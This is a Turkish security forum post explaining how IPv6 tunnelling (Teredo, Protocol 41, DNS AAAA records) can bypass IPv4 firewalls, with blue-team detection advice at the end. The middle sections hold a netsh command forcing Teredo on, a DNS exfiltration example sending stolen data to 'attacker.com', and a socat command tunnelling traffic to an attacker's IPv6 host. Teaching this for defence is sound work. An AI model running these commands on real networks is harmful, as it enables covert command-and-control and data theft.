Thread Starter
#0
⚠️ YASAL UYARI VE SORUMLULUK REDDİ (DISCLAIMER):
Bu doküman, Siber Güvenlik Uzmanları ve Ağ Yöneticileri için; modern ağlardaki protokol zafiyetlerini anlamak, "Shadow Network" trafiğini tespit etmek ve savunma mekanizmalarını güçlendirmek amacıyla EĞİTİM AMAÇLI hazırlanmıştır.
Burada anlatılan tünelleme tekniklerinin (Teredo, 6to4, ISATAP vb.) izinsiz ağlarda veri kaçırmak veya güvenlik duvarlarını aşmak için kullanılması suçtur. Bu içeriğin kötüye kullanımından doğacak her türlü yasal sorumluluk uygulayıcıya aittir. Yazar ve Platform yönetimi sorumluluk kabul etmez.
1. Giriş: Görünmez Otoban
Bir şirketin güvenlik duvarını (Firewall) düşünün. Kapıda devasa bir güvenlik görevlisi (IPv4 Filtreleri) var. Her geleni kontrol ediyor: "Sen 80. porttan geliyorsun, geç. Sen 445. porttan geliyorsun, dur."Ancak bu güvenlik görevlisi, Rus Matruşkası numarasını bilmiyor.
IPv6 Tünelleme, zararlı IPv6 paketini alıp, masum görünen bir IPv4 paketinin içine koymaktır. Güvenlik duvarı dıştaki IPv4 paketine bakar ("Aaa, bu sadece zararsız bir UDP paketi" der) ve içeri alır. Ancak paket içeri girdiğinde açılır ve içindeki IPv6 zararlısı serbest kalır.
Biz buna Protocol Encapsulation Bypass diyoruz.
2. Teknik 1: Teredo Tünelleme (NAT Düşmanı)
Windows işletim sistemlerinde varsayılan olarak gelen ve çoğu zaman açık unutulan bir protokoldür. Teredo, IPv6 paketlerini UDP/3544 portu üzerinden IPv4 içine gömer.Zafiyet:Çoğu güvenlik duvarı, iç ağdan dışarıya (Egress) yapılan UDP trafiğine çok toleranslıdır. Eğer bir saldırgan, içerdeki bir makinede Teredo tüneli açarsa, Firewall bunu sadece "dışarıya giden anlamsız bir UDP trafiği" olarak görür. Oysa o trafiğin içinde tam teşekküllü bir Reverse Shell veya C2 (Komuta Kontrol) bağlantısı akmaktadır.
Saldırı Senaryosu:
- Saldırgan iç ağdaki Windows makinede Teredo'yu zorla aktif eder.
- Zararlı trafik IPv6 adresine yönlendirilir.
- Windows, bunu UDP paketlerine sarıp Firewall'dan kaçırır.
CODE
123# Windows üzerinde Teredo'yu zorla aktif etme ve "Enterprise Client" moduna alma
# Bu mod, Domain ortamında bile tünelin açık kalmasını sağlar.
netsh interface teredo set state type=enterpriseclient3. Teknik 2: 6to4 ve Protocol 41 Bypass
Bu, en sinsi yöntemlerden biridir. IPv4 başlığında "Protocol" alanı vardır. TCP (6), UDP (17), ICMP (1) gibi. Bir de Protocol 41 (IPv6) vardır.Eski veya yanlış yapılandırılmış IDS/IPS cihazları, Protocol 41'i tanımaz veya analiz edemez (Deep Packet Inspection eksikliği). Bu paketleri "bilinmeyen trafik" olarak işaretleyip geçişine izin verirler (Fail-Open prensibi gereği).
Saldırı:Saldırgan, C2 sunucusuyla iletişimini TCP veya HTTP üzerinden değil, doğrudan IPv4 Protocol 41 içine gömülmüş IPv6 paketleri üzerinden yapar. Snort veya Suricata kuralları genellikle TCP/UDP imzalarına baktığı için bu trafiği kaçırır.
4. Teknik 3: DNS AAAA Kayıtları ile C2 (IPv6 Exfiltration)
Veri kaçırmanın (Data Exfiltration) en "elit" yollarından biridir. Güvenlik duvarları DNS sorgularını (UDP 53) engellemez.Saldırgan, çaldığı veriyi parçalara böler ve bir alan adının (domain) AAAA (IPv6) kaydıymış gibi sorgular.
- Normal DNS: google.com -> 142.250... (IPv4)
- Zararlı DNS: sifreler.attacker.com -> 2001:db8::[ÇALINAN_VERI_HEX]
5. Uygulama: Socat ile Tünel Kazmak
Linux tabanlı bir saldırı makinesinde (veya ele geçirilmiş bir sunucuda), socat aracı ile IPv4 ve IPv6 dünyaları arasında bir köprü kurulabilir.Bu komut, yerel IPv4 trafiğini alıp, IPv6 tüneli üzerinden dışarıdaki saldırgana aktarır.
CODE
123# TCP4 (IPv4) trafiğini al, TCP6 (IPv6) üzerinden tünelle
# Firewall IPv4 portunu izlerken, biz IPv6 üzerinden kaçıyoruz.
socat TCP4-LISTEN:1337,fork TCP6:[2001:db8::attacker_ip]:806. Blue Team: Görünmezi Nasıl Görürüz?
Bu tünelleri tespit etmek için standart kuralların dışına çıkmak gerekir:- Protocol 41 Engelleme: Güvenlik duvarında açıkça izin verilmediği sürece Protocol 41 (IPv6 Encapsulation) tamamen engellenmelidir.
- UDP 3544 İzleme: Teredo trafiği genellikle UDP 3544 portunu kullanır. Bu porttaki trafik incelenmelidir.
- IPv6 Devre Dışı Bırakma: Eğer iç ağda gerçekten IPv6 kullanılmıyorsa, uç noktalarda (Endpoint) IPv6 tamamen kapatılmalıdır. Aksi takdirde Windows, "yardımsever" davranıp arka planda tüneller açmaya çalışır.
- SIEM Kuralları: netsh interface ipv6 veya teredo içeren komut satırı aktiviteleri loglanmalı ve alarm üretmelidir.
7. Sonuç: Çift Yığın (Dual Stack) Tehlikesi
Ağ yöneticileri genellikle IPv4'ü "kalenin kapısı", IPv6'yı ise "kullanmadığımız arka pencere" olarak görür. Ancak saldırganlar, o pencerenin sadece açık olduğunu değil, aynı zamanda görünmez olduğunu da bilir. IPv6 tünelleme, modern ağlardaki en büyük "Gölge IT" (Shadow IT) riskidir.